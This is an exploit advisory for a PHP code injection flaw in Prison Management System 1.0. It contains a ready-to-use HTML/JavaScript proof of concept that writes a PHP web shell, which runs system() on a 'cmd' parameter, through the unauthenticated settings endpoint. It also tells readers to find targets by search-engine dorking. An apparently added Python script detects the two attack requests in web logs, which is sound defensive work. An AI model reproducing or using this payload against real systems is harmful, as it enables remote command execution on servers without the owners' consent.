
Prison Management System 1.0 Code Injection

Posted Sep 19, 2024
Authored by indoushka

Prison Management System version 1.0 suffers from a PHP code injection vulnerability.

tags | exploit, php
SHA-256 | 6f0c4d0c2b30b067997ee3da24377eec3ac2089defddc71f84d051b385d7de50

=============================================================================================================================================
| # Title : Prison Management System v1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip |
=============================================================================================================================================

poc :

[+] Dorking in Google or other search engines.

[+] This HTML page is designed to create a file and inject PHP code.

[+] save payload as poc.html

[+] On line 13, the 'content[welcome]' field names the file you want to create; it will be created with an HTML extension.

On the same line, put the payload that suits you.

[+] Set your target url

[+] payload :


<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>PHP code injection Tool</title>
  <script>
    async function sendRequest() {
      const url = document.getElementById('url').value;
      const postData = {
        'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`
      };

      try {
        const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
          },
          body: new URLSearchParams(postData).toString()
        });

        if (response.ok) {
          document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';
        } else {
          document.getElementById('result').innerText = 'Error: ' + response.statusText;
        }
      } catch (error) {
        document.getElementById('result').innerText = 'Error making request: ' + error.message;
      }
    }
  </script>
</head>
<body>
  <h1>Injection Tool</h1>
  <form onsubmit="event.preventDefault(); sendRequest();">
    <label for="url">Enter URL:</label>
    <input type="text" id="url" name="url" required>
    <button type="submit">Submit</button>
  </form>
  <pre id="result"></pre>
</body>
</html>
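The two requests the PoC above makes (a POST to SystemSettings.php?f=update_settings, then a GET with a cmd parameter on the welcome page) are what a defender would look for in web-server logs. The following Python script is an added detection example, not part of the original advisory; it parses constructed combined-format access log lines and flags both patterns.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx combined-log format (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Sep/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [19/Sep/2024:10:01:10 +0000] "POST /classes/SystemSettings.php?f=update_settings HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [19/Sep/2024:10:01:15 +0000] "GET /?cmd=ls%20-al HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Sep/2024:10:02:00 +0000] "GET /admin/?page=settings HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

SETTINGS_ENDPOINT = "/classes/SystemSettings.php"   # endpoint the PoC posts to
SHELL_PARAMS = {"cmd"}                                # parameter name used by the injected stub

def classify(line):
    """Return a list of finding strings for one log line (empty if nothing matches)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m["target"])
    query = parse_qs(parts.query, keep_blank_values=True)   # also percent-decodes values
    findings = []
    # 1) A write to the system settings endpoint: legitimate only from an admin session.
    if (m["method"] == "POST" and parts.path == SETTINGS_ENDPOINT
            and "update_settings" in query.get("f", [])):
        findings.append(f"{m['ip']} settings write via {parts.path}?f=update_settings "
                        f"(status {m['status']})")
    # 2) A request carrying the webshell-style parameter on any path.
    for name in sorted(SHELL_PARAMS.intersection(query)):
        findings.append(f"{m['ip']} shell parameter {name}={query[name][0]!r} on {parts.path}")
    return findings

def scan(log_text):
    """Run classify() over every line and collect the findings in log order."""
    return [f for line in log_text.splitlines() for f in classify(line)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Correlating finding 1 with a following finding 2 from the same client, as in the sample, is the sequence worth alerting on; a settings write with no admin session behind it is itself worth a look.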

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================